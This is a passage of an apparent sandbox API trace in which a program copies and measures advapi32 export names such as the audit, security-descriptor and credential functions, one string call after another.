lpString1=0x239e340, lpString2="AuditEnumeratePerUserPolicy" | out: lpString1="AuditEnumeratePerUserPolicy") returned="AuditEnumeratePerUserPolicy" [0158.338] lstrlenA (lpString="AUDITENUMERATEPERUSERPOLICY") returned 27 [0158.338] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditEnumerateSubCategories" | out: lpString1="AuditEnumerateSubCategories") returned="AuditEnumerateSubCategories" [0158.338] lstrlenA (lpString="AUDITENUMERATESUBCATEGORIES") returned 27 [0158.338] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditFree" | out: lpString1="AuditFree") returned="AuditFree" [0158.338] lstrlenA (lpString="AUDITFREE") returned 9 [0158.338] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditLookupCategoryGuidFromCategoryId" | out: lpString1="AuditLookupCategoryGuidFromCategoryId") returned="AuditLookupCategoryGuidFromCategoryId" [0158.338] lstrlenA (lpString="AUDITLOOKUPCATEGORYGUIDFROMCATEGORYID") returned 37 [0158.338] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditLookupCategoryIdFromCategoryGuid" | out: lpString1="AuditLookupCategoryIdFromCategoryGuid") returned="AuditLookupCategoryIdFromCategoryGuid" [0158.338] lstrlenA (lpString="AUDITLOOKUPCATEGORYIDFROMCATEGORYGUID") returned 37 [0158.338] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditLookupCategoryNameA" | out: lpString1="AuditLookupCategoryNameA") returned="AuditLookupCategoryNameA" [0158.338] lstrlenA (lpString="AUDITLOOKUPCATEGORYNAMEA") returned 24 [0158.338] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditLookupCategoryNameW" | out: lpString1="AuditLookupCategoryNameW") returned="AuditLookupCategoryNameW" [0158.338] lstrlenA (lpString="AUDITLOOKUPCATEGORYNAMEW") returned 24 [0158.338] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditLookupSubCategoryNameA" | out: lpString1="AuditLookupSubCategoryNameA") returned="AuditLookupSubCategoryNameA" [0158.338] lstrlenA (lpString="AUDITLOOKUPSUBCATEGORYNAMEA") returned 27 [0158.338] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditLookupSubCategoryNameW" | out: lpString1="AuditLookupSubCategoryNameW") returned="AuditLookupSubCategoryNameW" [0158.338] lstrlenA (lpString="AUDITLOOKUPSUBCATEGORYNAMEW") returned 27 [0158.338] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditQueryGlobalSaclA" | out: lpString1="AuditQueryGlobalSaclA") returned="AuditQueryGlobalSaclA" [0158.338] lstrlenA (lpString="AUDITQUERYGLOBALSACLA") returned 21 [0158.338] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditQueryGlobalSaclW" | out: lpString1="AuditQueryGlobalSaclW") returned="AuditQueryGlobalSaclW" [0158.338] lstrlenA (lpString="AUDITQUERYGLOBALSACLW") returned 21 [0158.338] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditQueryPerUserPolicy" | out: lpString1="AuditQueryPerUserPolicy") returned="AuditQueryPerUserPolicy" [0158.338] lstrlenA (lpString="AUDITQUERYPERUSERPOLICY") returned 23 [0158.338] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditQuerySecurity" | out: lpString1="AuditQuerySecurity") returned="AuditQuerySecurity" [0158.338] lstrlenA (lpString="AUDITQUERYSECURITY") returned 18 [0158.338] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditQuerySystemPolicy" | out: lpString1="AuditQuerySystemPolicy") returned="AuditQuerySystemPolicy" [0158.338] lstrlenA (lpString="AUDITQUERYSYSTEMPOLICY") returned 22 [0158.338] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditSetGlobalSaclA" | out: lpString1="AuditSetGlobalSaclA") returned="AuditSetGlobalSaclA" [0158.338] lstrlenA (lpString="AUDITSETGLOBALSACLA") returned 19 [0158.338] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditSetGlobalSaclW" | out: lpString1="AuditSetGlobalSaclW") returned="AuditSetGlobalSaclW" [0158.338] lstrlenA (lpString="AUDITSETGLOBALSACLW") returned 19 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditSetPerUserPolicy" | out: lpString1="AuditSetPerUserPolicy") returned="AuditSetPerUserPolicy" [0158.339] lstrlenA (lpString="AUDITSETPERUSERPOLICY") returned 21 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditSetSecurity" | out: lpString1="AuditSetSecurity") returned="AuditSetSecurity" [0158.339] lstrlenA (lpString="AUDITSETSECURITY") returned 16 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="AuditSetSystemPolicy" | out: lpString1="AuditSetSystemPolicy") returned="AuditSetSystemPolicy" [0158.339] lstrlenA (lpString="AUDITSETSYSTEMPOLICY") returned 20 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="BackupEventLogA" | out: lpString1="BackupEventLogA") returned="BackupEventLogA" [0158.339] lstrlenA (lpString="BACKUPEVENTLOGA") returned 15 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="BackupEventLogW" | out: lpString1="BackupEventLogW") returned="BackupEventLogW" [0158.339] lstrlenA (lpString="BACKUPEVENTLOGW") returned 15 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildExplicitAccessWithNameA" | out: lpString1="BuildExplicitAccessWithNameA") returned="BuildExplicitAccessWithNameA" [0158.339] lstrlenA (lpString="BUILDEXPLICITACCESSWITHNAMEA") returned 28 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildExplicitAccessWithNameW" | out: lpString1="BuildExplicitAccessWithNameW") returned="BuildExplicitAccessWithNameW" [0158.339] lstrlenA (lpString="BUILDEXPLICITACCESSWITHNAMEW") returned 28 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildImpersonateExplicitAccessWithNameA" | out: lpString1="BuildImpersonateExplicitAccessWithNameA") returned="BuildImpersonateExplicitAccessWithNameA" [0158.339] lstrlenA (lpString="BUILDIMPERSONATEEXPLICITACCESSWITHNAMEA") returned 39 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildImpersonateExplicitAccessWithNameW" | out: lpString1="BuildImpersonateExplicitAccessWithNameW") returned="BuildImpersonateExplicitAccessWithNameW" [0158.339] lstrlenA (lpString="BUILDIMPERSONATEEXPLICITACCESSWITHNAMEW") returned 39 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildImpersonateTrusteeA" | out: lpString1="BuildImpersonateTrusteeA") returned="BuildImpersonateTrusteeA" [0158.339] lstrlenA (lpString="BUILDIMPERSONATETRUSTEEA") returned 24 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildImpersonateTrusteeW" | out: lpString1="BuildImpersonateTrusteeW") returned="BuildImpersonateTrusteeW" [0158.339] lstrlenA (lpString="BUILDIMPERSONATETRUSTEEW") returned 24 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildSecurityDescriptorA" | out: lpString1="BuildSecurityDescriptorA") returned="BuildSecurityDescriptorA" [0158.339] lstrlenA (lpString="BUILDSECURITYDESCRIPTORA") returned 24 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildSecurityDescriptorW" | out: lpString1="BuildSecurityDescriptorW") returned="BuildSecurityDescriptorW" [0158.339] lstrlenA (lpString="BUILDSECURITYDESCRIPTORW") returned 24 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildTrusteeWithNameA" | out: lpString1="BuildTrusteeWithNameA") returned="BuildTrusteeWithNameA" [0158.339] lstrlenA (lpString="BUILDTRUSTEEWITHNAMEA") returned 21 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildTrusteeWithNameW" | out: lpString1="BuildTrusteeWithNameW") returned="BuildTrusteeWithNameW" [0158.339] lstrlenA (lpString="BUILDTRUSTEEWITHNAMEW") returned 21 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildTrusteeWithObjectsAndNameA" | out: lpString1="BuildTrusteeWithObjectsAndNameA") returned="BuildTrusteeWithObjectsAndNameA" [0158.339] lstrlenA (lpString="BUILDTRUSTEEWITHOBJECTSANDNAMEA") returned 31 [0158.339] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildTrusteeWithObjectsAndNameW" | out: lpString1="BuildTrusteeWithObjectsAndNameW") returned="BuildTrusteeWithObjectsAndNameW" [0158.339] lstrlenA (lpString="BUILDTRUSTEEWITHOBJECTSANDNAMEW") returned 31 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildTrusteeWithObjectsAndSidA" | out: lpString1="BuildTrusteeWithObjectsAndSidA") returned="BuildTrusteeWithObjectsAndSidA" [0158.340] lstrlenA (lpString="BUILDTRUSTEEWITHOBJECTSANDSIDA") returned 30 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildTrusteeWithObjectsAndSidW" | out: lpString1="BuildTrusteeWithObjectsAndSidW") returned="BuildTrusteeWithObjectsAndSidW" [0158.340] lstrlenA (lpString="BUILDTRUSTEEWITHOBJECTSANDSIDW") returned 30 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildTrusteeWithSidA" | out: lpString1="BuildTrusteeWithSidA") returned="BuildTrusteeWithSidA" [0158.340] lstrlenA (lpString="BUILDTRUSTEEWITHSIDA") returned 20 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="BuildTrusteeWithSidW" | out: lpString1="BuildTrusteeWithSidW") returned="BuildTrusteeWithSidW" [0158.340] lstrlenA (lpString="BUILDTRUSTEEWITHSIDW") returned 20 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="CancelOverlappedAccess" | out: lpString1="CancelOverlappedAccess") returned="CancelOverlappedAccess" [0158.340] lstrlenA (lpString="CANCELOVERLAPPEDACCESS") returned 22 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="ChangeServiceConfig2A" | out: lpString1="ChangeServiceConfig2A") returned="ChangeServiceConfig2A" [0158.340] lstrlenA (lpString="CHANGESERVICECONFIG2A") returned 21 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="ChangeServiceConfig2W" | out: lpString1="ChangeServiceConfig2W") returned="ChangeServiceConfig2W" [0158.340] lstrlenA (lpString="CHANGESERVICECONFIG2W") returned 21 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="ChangeServiceConfigA" | out: lpString1="ChangeServiceConfigA") returned="ChangeServiceConfigA" [0158.340] lstrlenA (lpString="CHANGESERVICECONFIGA") returned 20 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="ChangeServiceConfigW" | out: lpString1="ChangeServiceConfigW") returned="ChangeServiceConfigW" [0158.340] lstrlenA (lpString="CHANGESERVICECONFIGW") returned 20 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="CheckTokenMembership" | out: lpString1="CheckTokenMembership") returned="CheckTokenMembership" [0158.340] lstrlenA (lpString="CHECKTOKENMEMBERSHIP") returned 20 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="ClearEventLogA" | out: lpString1="ClearEventLogA") returned="ClearEventLogA" [0158.340] lstrlenA (lpString="CLEAREVENTLOGA") returned 14 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="ClearEventLogW" | out: lpString1="ClearEventLogW") returned="ClearEventLogW" [0158.340] lstrlenA (lpString="CLEAREVENTLOGW") returned 14 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseCodeAuthzLevel" | out: lpString1="CloseCodeAuthzLevel") returned="CloseCodeAuthzLevel" [0158.340] lstrlenA (lpString="CLOSECODEAUTHZLEVEL") returned 19 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseEncryptedFileRaw" | out: lpString1="CloseEncryptedFileRaw") returned="CloseEncryptedFileRaw" [0158.340] lstrlenA (lpString="CLOSEENCRYPTEDFILERAW") returned 21 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseEventLog" | out: lpString1="CloseEventLog") returned="CloseEventLog" [0158.340] lstrlenA (lpString="CLOSEEVENTLOG") returned 13 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseServiceHandle" | out: lpString1="CloseServiceHandle") returned="CloseServiceHandle" [0158.340] lstrlenA (lpString="CLOSESERVICEHANDLE") returned 18 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseThreadWaitChainSession" | out: lpString1="CloseThreadWaitChainSession") returned="CloseThreadWaitChainSession" [0158.340] lstrlenA (lpString="CLOSETHREADWAITCHAINSESSION") returned 27 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="CloseTrace" | out: lpString1="CloseTrace") returned="CloseTrace" [0158.340] lstrlenA (lpString="CLOSETRACE") returned 10 [0158.340] lstrcpyA (in: lpString1=0x239e340, lpString2="CommandLineFromMsiDescriptor" | out: lpString1="CommandLineFromMsiDescriptor") returned="CommandLineFromMsiDescriptor" [0158.340] lstrlenA (lpString="COMMANDLINEFROMMSIDESCRIPTOR") returned 28 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ComputeAccessTokenFromCodeAuthzLevel" | out: lpString1="ComputeAccessTokenFromCodeAuthzLevel") returned="ComputeAccessTokenFromCodeAuthzLevel" [0158.341] lstrlenA (lpString="COMPUTEACCESSTOKENFROMCODEAUTHZLEVEL") returned 36 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ControlService" | out: lpString1="ControlService") returned="ControlService" [0158.341] lstrlenA (lpString="CONTROLSERVICE") returned 14 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ControlServiceExA" | out: lpString1="ControlServiceExA") returned="ControlServiceExA" [0158.341] lstrlenA (lpString="CONTROLSERVICEEXA") returned 17 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ControlServiceExW" | out: lpString1="ControlServiceExW") returned="ControlServiceExW" [0158.341] lstrlenA (lpString="CONTROLSERVICEEXW") returned 17 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ControlTraceA" | out: lpString1="ControlTraceA") returned="ControlTraceA" [0158.341] lstrlenA (lpString="CONTROLTRACEA") returned 13 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ControlTraceW" | out: lpString1="ControlTraceW") returned="ControlTraceW" [0158.341] lstrlenA (lpString="CONTROLTRACEW") returned 13 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertAccessToSecurityDescriptorA" | out: lpString1="ConvertAccessToSecurityDescriptorA") returned="ConvertAccessToSecurityDescriptorA" [0158.341] lstrlenA (lpString="CONVERTACCESSTOSECURITYDESCRIPTORA") returned 34 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertAccessToSecurityDescriptorW" | out: lpString1="ConvertAccessToSecurityDescriptorW") returned="ConvertAccessToSecurityDescriptorW" [0158.341] lstrlenA (lpString="CONVERTACCESSTOSECURITYDESCRIPTORW") returned 34 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertSDToStringSDRootDomainA" | out: lpString1="ConvertSDToStringSDRootDomainA") returned="ConvertSDToStringSDRootDomainA" [0158.341] lstrlenA (lpString="CONVERTSDTOSTRINGSDROOTDOMAINA") returned 30 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertSDToStringSDRootDomainW" | out: lpString1="ConvertSDToStringSDRootDomainW") returned="ConvertSDToStringSDRootDomainW" [0158.341] lstrlenA (lpString="CONVERTSDTOSTRINGSDROOTDOMAINW") returned 30 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertSecurityDescriptorToAccessA" | out: lpString1="ConvertSecurityDescriptorToAccessA") returned="ConvertSecurityDescriptorToAccessA" [0158.341] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOACCESSA") returned 34 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertSecurityDescriptorToAccessNamedA" | out: lpString1="ConvertSecurityDescriptorToAccessNamedA") returned="ConvertSecurityDescriptorToAccessNamedA" [0158.341] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOACCESSNAMEDA") returned 39 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertSecurityDescriptorToAccessNamedW" | out: lpString1="ConvertSecurityDescriptorToAccessNamedW") returned="ConvertSecurityDescriptorToAccessNamedW" [0158.341] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOACCESSNAMEDW") returned 39 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertSecurityDescriptorToAccessW" | out: lpString1="ConvertSecurityDescriptorToAccessW") returned="ConvertSecurityDescriptorToAccessW" [0158.341] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOACCESSW") returned 34 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertSecurityDescriptorToStringSecurityDescriptorA" | out: lpString1="ConvertSecurityDescriptorToStringSecurityDescriptorA") returned="ConvertSecurityDescriptorToStringSecurityDescriptorA" [0158.341] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOSTRINGSECURITYDESCRIPTORA") returned 52 [0158.341] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertSecurityDescriptorToStringSecurityDescriptorW" | out: lpString1="ConvertSecurityDescriptorToStringSecurityDescriptorW") returned="ConvertSecurityDescriptorToStringSecurityDescriptorW" [0158.341] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOSTRINGSECURITYDESCRIPTORW") returned 52 [0158.342] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertSidToStringSidA" | out: lpString1="ConvertSidToStringSidA") returned="ConvertSidToStringSidA" [0158.342] lstrlenA (lpString="CONVERTSIDTOSTRINGSIDA") returned 22 [0158.342] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertSidToStringSidW" | out: lpString1="ConvertSidToStringSidW") returned="ConvertSidToStringSidW" [0158.342] lstrlenA (lpString="CONVERTSIDTOSTRINGSIDW") returned 22 [0158.342] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertStringSDToSDDomainA" | out: lpString1="ConvertStringSDToSDDomainA") returned="ConvertStringSDToSDDomainA" [0158.342] lstrlenA (lpString="CONVERTSTRINGSDTOSDDOMAINA") returned 26 [0158.342] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertStringSDToSDDomainW" | out: lpString1="ConvertStringSDToSDDomainW") returned="ConvertStringSDToSDDomainW" [0158.342] lstrlenA (lpString="CONVERTSTRINGSDTOSDDOMAINW") returned 26 [0158.342] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertStringSDToSDRootDomainA" | out: lpString1="ConvertStringSDToSDRootDomainA") returned="ConvertStringSDToSDRootDomainA" [0158.342] lstrlenA (lpString="CONVERTSTRINGSDTOSDROOTDOMAINA") returned 30 [0158.342] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertStringSDToSDRootDomainW" | out: lpString1="ConvertStringSDToSDRootDomainW") returned="ConvertStringSDToSDRootDomainW" [0158.342] lstrlenA (lpString="CONVERTSTRINGSDTOSDROOTDOMAINW") returned 30 [0158.342] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertStringSecurityDescriptorToSecurityDescriptorA" | out: lpString1="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned="ConvertStringSecurityDescriptorToSecurityDescriptorA" [0158.342] lstrlenA (lpString="CONVERTSTRINGSECURITYDESCRIPTORTOSECURITYDESCRIPTORA") returned 52 [0158.342] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertStringSecurityDescriptorToSecurityDescriptorW" | out: lpString1="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned="ConvertStringSecurityDescriptorToSecurityDescriptorW" [0158.342] lstrlenA (lpString="CONVERTSTRINGSECURITYDESCRIPTORTOSECURITYDESCRIPTORW") returned 52 [0158.342] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertStringSidToSidA" | out: lpString1="ConvertStringSidToSidA") returned="ConvertStringSidToSidA" [0158.342] lstrlenA (lpString="CONVERTSTRINGSIDTOSIDA") returned 22 [0158.342] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertStringSidToSidW" | out: lpString1="ConvertStringSidToSidW") returned="ConvertStringSidToSidW" [0158.342] lstrlenA (lpString="CONVERTSTRINGSIDTOSIDW") returned 22 [0158.342] lstrcpyA (in: lpString1=0x239e340, lpString2="ConvertToAutoInheritPrivateObjectSecurity" | out: lpString1="ConvertToAutoInheritPrivateObjectSecurity") returned="ConvertToAutoInheritPrivateObjectSecurity" [0158.342] lstrlenA (lpString="CONVERTTOAUTOINHERITPRIVATEOBJECTSECURITY") returned 41 [0158.342] lstrcpyA (in: lpString1=0x239e340, lpString2="CopySid" | out: lpString1="CopySid") returned="CopySid" [0158.342] lstrlenA (lpString="COPYSID") returned 7 [0158.342] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateCodeAuthzLevel" | out: lpString1="CreateCodeAuthzLevel") returned="CreateCodeAuthzLevel" [0158.342] lstrlenA (lpString="CREATECODEAUTHZLEVEL") returned 20 [0158.342] lstrcpyA (in: lpString1=0x239e340, lpString2="CreatePrivateObjectSecurity" | out: lpString1="CreatePrivateObjectSecurity") returned="CreatePrivateObjectSecurity" [0158.342] lstrlenA (lpString="CREATEPRIVATEOBJECTSECURITY") returned 27 [0158.342] lstrcpyA (in: lpString1=0x239e340, lpString2="CreatePrivateObjectSecurityEx" | out: lpString1="CreatePrivateObjectSecurityEx") returned="CreatePrivateObjectSecurityEx" [0158.342] lstrlenA (lpString="CREATEPRIVATEOBJECTSECURITYEX") returned 29 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CreatePrivateObjectSecurityWithMultipleInheritance" | out: lpString1="CreatePrivateObjectSecurityWithMultipleInheritance") returned="CreatePrivateObjectSecurityWithMultipleInheritance" [0158.343] lstrlenA (lpString="CREATEPRIVATEOBJECTSECURITYWITHMULTIPLEINHERITANCE") returned 50 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateProcessAsUserA" | out: lpString1="CreateProcessAsUserA") returned="CreateProcessAsUserA" [0158.343] lstrlenA (lpString="CREATEPROCESSASUSERA") returned 20 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0158.343] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateProcessWithLogonW" | out: lpString1="CreateProcessWithLogonW") returned="CreateProcessWithLogonW" [0158.343] lstrlenA (lpString="CREATEPROCESSWITHLOGONW") returned 23 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateProcessWithTokenW" | out: lpString1="CreateProcessWithTokenW") returned="CreateProcessWithTokenW" [0158.343] lstrlenA (lpString="CREATEPROCESSWITHTOKENW") returned 23 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateRestrictedToken" | out: lpString1="CreateRestrictedToken") returned="CreateRestrictedToken" [0158.343] lstrlenA (lpString="CREATERESTRICTEDTOKEN") returned 21 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateServiceA" | out: lpString1="CreateServiceA") returned="CreateServiceA" [0158.343] lstrlenA (lpString="CREATESERVICEA") returned 14 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateServiceW" | out: lpString1="CreateServiceW") returned="CreateServiceW" [0158.343] lstrlenA (lpString="CREATESERVICEW") returned 14 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateTraceInstanceId" | out: lpString1="CreateTraceInstanceId") returned="CreateTraceInstanceId" [0158.343] lstrlenA (lpString="CREATETRACEINSTANCEID") returned 21 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CreateWellKnownSid" | out: lpString1="CreateWellKnownSid") returned="CreateWellKnownSid" [0158.343] lstrlenA (lpString="CREATEWELLKNOWNSID") returned 18 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CredBackupCredentials" | out: lpString1="CredBackupCredentials") returned="CredBackupCredentials" [0158.343] lstrlenA (lpString="CREDBACKUPCREDENTIALS") returned 21 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CredDeleteA" | out: lpString1="CredDeleteA") returned="CredDeleteA" [0158.343] lstrlenA (lpString="CREDDELETEA") returned 11 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CredDeleteW" | out: lpString1="CredDeleteW") returned="CredDeleteW" [0158.343] lstrlenA (lpString="CREDDELETEW") returned 11 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CredEncryptAndMarshalBinaryBlob" | out: lpString1="CredEncryptAndMarshalBinaryBlob") returned="CredEncryptAndMarshalBinaryBlob" [0158.343] lstrlenA (lpString="CREDENCRYPTANDMARSHALBINARYBLOB") returned 31 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CredEnumerateA" | out: lpString1="CredEnumerateA") returned="CredEnumerateA" [0158.343] lstrlenA (lpString="CREDENUMERATEA") returned 14 [0158.343] lstrcpyA (in: lpString1=0x239e340, lpString2="CredEnumerateW" | out: lpString1="CredEnumerateW") returned="CredEnumerateW" [0158.344] lstrlenA (lpString="CREDENUMERATEW") returned 14 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredFindBestCredentialA" | out: lpString1="CredFindBestCredentialA") returned="CredFindBestCredentialA" [0158.344] lstrlenA (lpString="CREDFINDBESTCREDENTIALA") returned 23 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredFindBestCredentialW" | out: lpString1="CredFindBestCredentialW") returned="CredFindBestCredentialW" [0158.344] lstrlenA (lpString="CREDFINDBESTCREDENTIALW") returned 23 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredFree" | out: lpString1="CredFree") returned="CredFree" [0158.344] lstrlenA (lpString="CREDFREE") returned 8 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredGetSessionTypes" | out: lpString1="CredGetSessionTypes") returned="CredGetSessionTypes" [0158.344] lstrlenA (lpString="CREDGETSESSIONTYPES") returned 19 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredGetTargetInfoA" | out: lpString1="CredGetTargetInfoA") returned="CredGetTargetInfoA" [0158.344] lstrlenA (lpString="CREDGETTARGETINFOA") returned 18 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredGetTargetInfoW" | out: lpString1="CredGetTargetInfoW") returned="CredGetTargetInfoW" [0158.344] lstrlenA (lpString="CREDGETTARGETINFOW") returned 18 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredIsMarshaledCredentialA" | out: lpString1="CredIsMarshaledCredentialA") returned="CredIsMarshaledCredentialA" [0158.344] lstrlenA (lpString="CREDISMARSHALEDCREDENTIALA") returned 26 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredIsMarshaledCredentialW" | out: lpString1="CredIsMarshaledCredentialW") returned="CredIsMarshaledCredentialW" [0158.344] lstrlenA (lpString="CREDISMARSHALEDCREDENTIALW") returned 26 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredIsProtectedA" | out: lpString1="CredIsProtectedA") returned="CredIsProtectedA" [0158.344] lstrlenA (lpString="CREDISPROTECTEDA") returned 16 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredIsProtectedW" | out: lpString1="CredIsProtectedW") returned="CredIsProtectedW" [0158.344] lstrlenA (lpString="CREDISPROTECTEDW") returned 16 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredMarshalCredentialA" | out: lpString1="CredMarshalCredentialA") returned="CredMarshalCredentialA" [0158.344] lstrlenA (lpString="CREDMARSHALCREDENTIALA") returned 22 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredMarshalCredentialW" | out: lpString1="CredMarshalCredentialW") returned="CredMarshalCredentialW" [0158.344] lstrlenA (lpString="CREDMARSHALCREDENTIALW") returned 22 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredProfileLoaded" | out: lpString1="CredProfileLoaded") returned="CredProfileLoaded" [0158.344] lstrlenA (lpString="CREDPROFILELOADED") returned 17 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredProfileUnloaded" | out: lpString1="CredProfileUnloaded") returned="CredProfileUnloaded" [0158.344] lstrlenA (lpString="CREDPROFILEUNLOADED") returned 19 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredProtectA" | out: lpString1="CredProtectA") returned="CredProtectA" [0158.344] lstrlenA (lpString="CREDPROTECTA") returned 12 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredProtectW" | out: lpString1="CredProtectW") returned="CredProtectW" [0158.344] lstrlenA (lpString="CREDPROTECTW") returned 12 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredReadA" | out: lpString1="CredReadA") returned="CredReadA" [0158.344] lstrlenA (lpString="CREDREADA") returned 9 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredReadByTokenHandle" | out: lpString1="CredReadByTokenHandle") returned="CredReadByTokenHandle" [0158.344] lstrlenA (lpString="CREDREADBYTOKENHANDLE") returned 21 [0158.344] lstrcpyA (in: lpString1=0x239e340, lpString2="CredReadDomainCredentialsA" | out: lpString1="CredReadDomainCredentialsA") returned="CredReadDomainCredentialsA" [0158.345] lstrlenA (lpString="CREDREADDOMAINCREDENTIALSA") returned 26 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredReadDomainCredentialsW" | out: lpString1="CredReadDomainCredentialsW") returned="CredReadDomainCredentialsW" [0158.345] lstrlenA 